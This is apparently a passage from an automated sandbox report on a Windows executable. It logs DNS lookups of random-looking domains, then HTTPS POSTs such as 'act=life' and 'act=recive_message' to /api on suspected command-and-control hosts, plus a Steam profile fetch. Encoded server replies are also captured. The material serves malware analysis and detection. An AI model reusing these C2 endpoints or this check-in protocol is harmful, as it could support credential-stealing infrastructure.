                                                                                                                                                                                                              Dec 18, 2024 09:58:44.071540117 CET53592961.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.074229956 CET5511853192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.211807966 CET53551181.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.589596033 CET5380653192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.729334116 CET53538061.1.1.1192.168.2.8

                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Dec 18, 2024 09:58:34.137711048 CET192.168.2.81.1.1.10xceaStandard query (0)spend-shiny.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:34.461277008 CET192.168.2.81.1.1.10x78bfStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.448316097 CET192.168.2.81.1.1.10x78bfStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.138128996 CET192.168.2.81.1.1.10xac2dStandard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.135252953 CET192.168.2.81.1.1.10xac2dStandard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.536330938 CET192.168.2.81.1.1.10x880eStandard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.847702980 CET192.168.2.81.1.1.10xeb64Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.075720072 CET192.168.2.81.1.1.10x4f81Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.381328106 CET192.168.2.81.1.1.10x25fbStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.610497952 CET192.168.2.81.1.1.10x6ecaStandard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.846754074 CET192.168.2.81.1.1.10xb234Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.074229956 CET192.168.2.81.1.1.10xd79eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.589596033 CET192.168.2.81.1.1.10x49fStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Dec 18, 2024 09:58:34.459342957 CET1.1.1.1192.168.2.80xceaName error (3)spend-shiny.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748353958 CET1.1.1.1192.168.2.80x78bfNo error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748353958 CET1.1.1.1192.168.2.80x78bfNo error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748353958 CET1.1.1.1192.168.2.80x78bfNo error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748372078 CET1.1.1.1192.168.2.80x78bfNo error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748372078 CET1.1.1.1192.168.2.80x78bfNo error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748372078 CET1.1.1.1192.168.2.80x78bfNo error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411386967 CET1.1.1.1192.168.2.80xac2dNo error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411386967 CET1.1.1.1192.168.2.80xac2dNo error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411386967 CET1.1.1.1192.168.2.80xac2dNo error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411403894 CET1.1.1.1192.168.2.80xac2dNo error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411403894 CET1.1.1.1192.168.2.80xac2dNo error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411403894 CET1.1.1.1192.168.2.80xac2dNo error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.844500065 CET1.1.1.1192.168.2.80x880eName error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.071993113 CET1.1.1.1192.168.2.80xeb64Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.377454042 CET1.1.1.1192.168.2.80x4f81Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.606302977 CET1.1.1.1192.168.2.80x25fbName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.842202902 CET1.1.1.1192.168.2.80x6ecaName error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.071540117 CET1.1.1.1192.168.2.80xb234Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.211807966 CET1.1.1.1192.168.2.80xd79eNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.729334116 CET1.1.1.1192.168.2.80x49fNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.729334116 CET1.1.1.1192.168.2.80x49fNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                              • immureprech.biz
                                                                                                                                                                                                              • deafeninggeh.biz
                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                              • lev-tolstoi.com

                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.849712178.62.201.344437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:37 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                              Host: immureprech.biz
                                                                                                                                                                                                              2024-12-18 08:58:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                              2024-12-18 08:58:38 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:58:37 GMT
                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.84971345.77.249.794437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:41 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                              Host: deafeninggeh.biz
                                                                                                                                                                                                              2024-12-18 08:58:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                              2024-12-18 08:58:42 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:58:42 GMT
                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.84971423.55.153.1064437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:45 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                              2024-12-18 08:58:46 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:58:46 GMT
                                                                                                                                                                                                              Content-Length: 35121
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: sessionid=2151b6b24648c1caa410d44f; Path=/; Secure; SameSite=None
                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                              2024-12-18 08:58:46 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                              2024-12-18 08:58:46 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                              Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                              2024-12-18 08:58:46 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                              Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.849715104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:47 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                              2024-12-18 08:58:47 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                              2024-12-18 08:58:49 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:58:48 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=tkcbcl124rp2qug0ak1me8ftea; expires=Sun, 13-Apr-2025 02:45:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bi0GaSrEgKd6CRwOQgyHKAbg%2Fw1%2BQsbmoe3fZFm%2FrGAYBzT0BR3Gb5UU4MR1TkXiDWvh7WNutEDmvcRmxmtTxgaCgzaIatRzM%2FVJLvBggp3OBiwYX0ZlDsQyqeM8XO%2BEwQA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df4036b75428e-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1572&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1789215&cwnd=222&unsent_bytes=0&cid=47761f27d97e0afc&ts=1127&x=0"
                                                                                                                                                                                                              2024-12-18 08:58:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                              2024-12-18 08:58:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.849716104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:50 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                              2024-12-18 08:58:50 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d
                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=tfL8re--&j=
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:58:51 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=trbdf5350id2jvlv1vmvj0muea; expires=Sun, 13-Apr-2025 02:45:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PVrvMVj04B%2BgCO%2B0Vtejo6tWXmcHV%2FUf%2B%2FIhZTLlyQoereGl3tHbFLvIzuOqsESeT%2B2ouSUWHIr2xQ92daDPatx2X6v65vOYpMYYrRncv4s49oYukvdScemWk%2B%2Bya1FH1U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df4134a215e6d-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1591&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=941&delivery_rate=1681059&cwnd=252&unsent_bytes=0&cid=c08a1d28928afdfd&ts=835&x=0"
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC325INData Raw: 34 65 31 0d 0a 42 35 73 61 6f 67 6e 30 50 68 53 32 50 2b 58 47 34 41 69 79 32 64 56 2b 75 6b 6f 56 48 51 79 6c 4e 49 4b 65 74 48 36 61 45 36 4a 38 75 57 79 41 4d 38 41 53 4e 73 56 61 78 2f 79 55 65 73 65 38 2b 56 7a 62 4c 6a 63 6e 61 73 52 59 38 66 75 59 58 4f 78 2b 67 44 33 39 65 38 35 36 6b 52 49 32 30 30 66 48 2f 4c 74 7a 6b 4c 79 37 58 49 42 6f 63 48 64 75 78 46 6a 67 2f 39 38 52 36 6e 2f 42 62 2f 64 39 79 6d 79 58 57 6e 58 61 55 6f 43 6a 68 57 6e 59 74 37 77 54 30 69 63 33 4d 53 37 41 54 71 43 6b 6c 6a 50 2f 5a 38 4e 4b 2b 6d 6e 4a 4b 34 6b 53 62 35 52 61 69 2b 54 61 4b 74 4f 38 74 78 4c 63 4c 6e 35 31 5a 4d 31 51 34 66 72 65 44 76 4e 31 79 6d 2f 35 66 73 74 6d 6e 6b 35 34 30 46 57 4c 70 59 39 70 6b 50 58 33 47 38 42 6f 4c 7a 38 39 39 56 58 78 37 63
                                                                                                                                                                                                              Data Ascii: 4e1B5saogn0PhS2P+XG4Aiy2dV+ukoVHQylNIKetH6aE6J8uWyAM8ASNsVax/yUese8+VzbLjcnasRY8fuYXOx+gD39e856kRI200fH/LtzkLy7XIBocHduxFjg/98R6n/Bb/d9ymyXWnXaUoCjhWnYt7wT0ic3MS7ATqCkljP/Z8NK+mnJK4kSb5Rai+TaKtO8txLcLn51ZM1Q4freDvN1ym/5fstmnk540FWLpY9pkPX3G8BoLz899VXx7c
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC931INData Raw: 39 7a 7a 49 4b 33 52 72 59 39 59 57 2f 37 4c 50 58 50 39 39 67 44 32 35 66 73 35 71 6d 31 78 6b 33 46 61 4d 6f 5a 42 68 32 62 61 36 48 4e 55 69 65 48 78 75 77 46 7a 71 38 39 77 59 39 58 7a 47 5a 66 6b 34 6a 69 75 52 52 44 61 4d 48 61 53 68 6b 6d 33 63 72 66 55 6d 6d 44 63 35 5a 69 37 41 57 71 43 6b 6c 68 54 39 63 73 4e 75 39 6e 76 49 59 49 52 63 5a 4e 4a 51 67 72 61 45 62 39 36 78 74 41 37 53 4a 6e 46 38 5a 38 78 66 35 66 76 53 58 4c 59 78 78 33 32 35 49 49 42 4b 6d 31 64 36 33 6b 71 48 35 4a 30 6b 79 66 75 77 45 4a 68 77 4e 33 74 76 77 31 66 6b 38 74 67 59 39 48 66 4f 61 50 5a 2b 79 6d 75 52 56 6e 37 63 58 49 71 76 6a 57 72 56 74 72 4d 61 31 43 6c 79 50 79 43 48 55 66 69 38 6a 6c 7a 57 64 73 4e 33 75 30 33 44 5a 5a 68 62 59 4a 52 43 79 62 33 43 62 64 7a
                                                                                                                                                                                                              Data Ascii: 9zzIK3RrY9YW/7LPXP99gD25fs5qm1xk3FaMoZBh2ba6HNUieHxuwFzq89wY9XzGZfk4jiuRRDaMHaShkm3crfUmmDc5Zi7AWqCklhT9csNu9nvIYIRcZNJQgraEb96xtA7SJnF8Z8xf5fvSXLYxx325IIBKm1d63kqH5J0kyfuwEJhwN3tvw1fk8tgY9HfOaPZ+ymuRVn7cXIqvjWrVtrMa1ClyPyCHUfi8jlzWdsN3u03DZZhbYJRCyb3Cbdz
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1369INData Raw: 34 34 33 62 0d 0a 6c 57 50 70 49 39 72 32 37 4f 78 45 64 4d 6e 65 48 68 6d 78 46 72 6c 38 64 56 63 74 6a 48 48 66 62 6b 67 67 45 36 59 58 32 66 46 48 37 4b 6e 6a 47 54 58 72 66 63 44 6c 6a 45 33 65 47 4b 48 44 71 44 32 30 52 76 38 66 4d 70 6d 2f 58 7a 4e 5a 4a 39 56 66 38 5a 58 69 36 71 51 5a 39 71 2b 75 52 44 64 4a 33 64 2b 62 38 6c 63 36 37 79 59 58 50 39 70 67 44 32 35 56 38 31 37 68 46 5a 39 78 52 2b 79 70 34 78 6b 31 36 33 33 41 35 59 78 4e 33 68 69 68 77 36 67 39 39 41 51 39 48 48 47 64 2f 64 33 30 6d 47 45 57 48 6a 51 55 59 6d 74 6a 32 58 56 71 62 4d 63 79 69 6c 79 65 47 44 4b 52 4f 57 38 6d 46 7a 2f 61 59 41 39 75 55 4c 30 62 49 5a 4e 63 5a 5a 6f 68 4b 71 4d 62 63 62 37 71 46 4c 42 61 48 42 7a 4c 70 38 57 34 2f 44 62 46 66 31 2b 30 6d 2f 31 65 64
                                                                                                                                                                                                              Data Ascii: 443blWPpI9r27OxEdMneHhmxFrl8dVctjHHfbkggE6YX2fFH7KnjGTXrfcDljE3eGKHDqD20Rv8fMpm/XzNZJ9Vf8ZXi6qQZ9q+uRDdJ3d+b8lc67yYXP9pgD25V817hFZ9xR+yp4xk1633A5YxN3hihw6g99AQ9HHGd/d30mGEWHjQUYmtj2XVqbMcyilyeGDKROW8mFz/aYA9uUL0bIZNcZZohKqMbcb7qFLBaHBzLp8W4/DbFf1+0m/1ed
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1369INData Raw: 65 4e 42 58 67 71 43 4f 59 4e 43 2b 70 52 54 65 4c 33 74 33 61 38 68 51 35 66 48 52 46 2f 74 6a 30 6d 62 39 64 73 77 72 32 42 78 78 7a 42 33 66 35 4b 64 39 30 36 75 78 48 35 67 33 4f 57 59 75 77 46 71 67 70 4a 59 63 39 6e 33 4c 59 76 4a 7a 78 47 2b 57 55 58 33 61 55 34 36 6f 69 6d 62 58 71 62 6f 5a 30 43 4a 2b 65 6d 4c 4b 56 66 4c 2f 31 31 79 32 4d 63 64 39 75 53 43 41 54 4b 56 72 56 5a 52 43 79 62 33 43 62 64 7a 37 37 31 7a 5a 49 48 42 78 61 74 56 59 38 76 4c 52 48 50 35 35 79 47 4c 31 64 73 35 35 6e 6c 31 32 32 6c 4b 50 72 59 5a 72 31 4c 2b 37 47 35 68 6d 4e 33 68 32 68 77 36 67 31 4e 55 47 34 6a 50 75 62 76 6c 2f 30 48 32 4e 48 47 6d 61 52 4d 65 6a 6a 69 71 49 2b 37 4d 58 30 69 46 30 64 6d 72 4b 56 75 6e 7a 33 78 54 31 65 64 4a 6b 38 32 72 45 62 70 64
                                                                                                                                                                                                              Data Ascii: eNBXgqCOYNC+pRTeL3t3a8hQ5fHRF/tj0mb9dswr2BxxzB3f5Kd906uxH5g3OWYuwFqgpJYc9n3LYvJzxG+WUX3aU46oimbXqboZ0CJ+emLKVfL/11y2Mcd9uSCATKVrVZRCyb3Cbdz771zZIHBxatVY8vLRHP55yGL1ds55nl122lKPrYZr1L+7G5hmN3h2hw6g1NUG4jPubvl/0H2NHGmaRMejjiqI+7MX0iF0dmrKVunz3xT1edJk82rEbpd
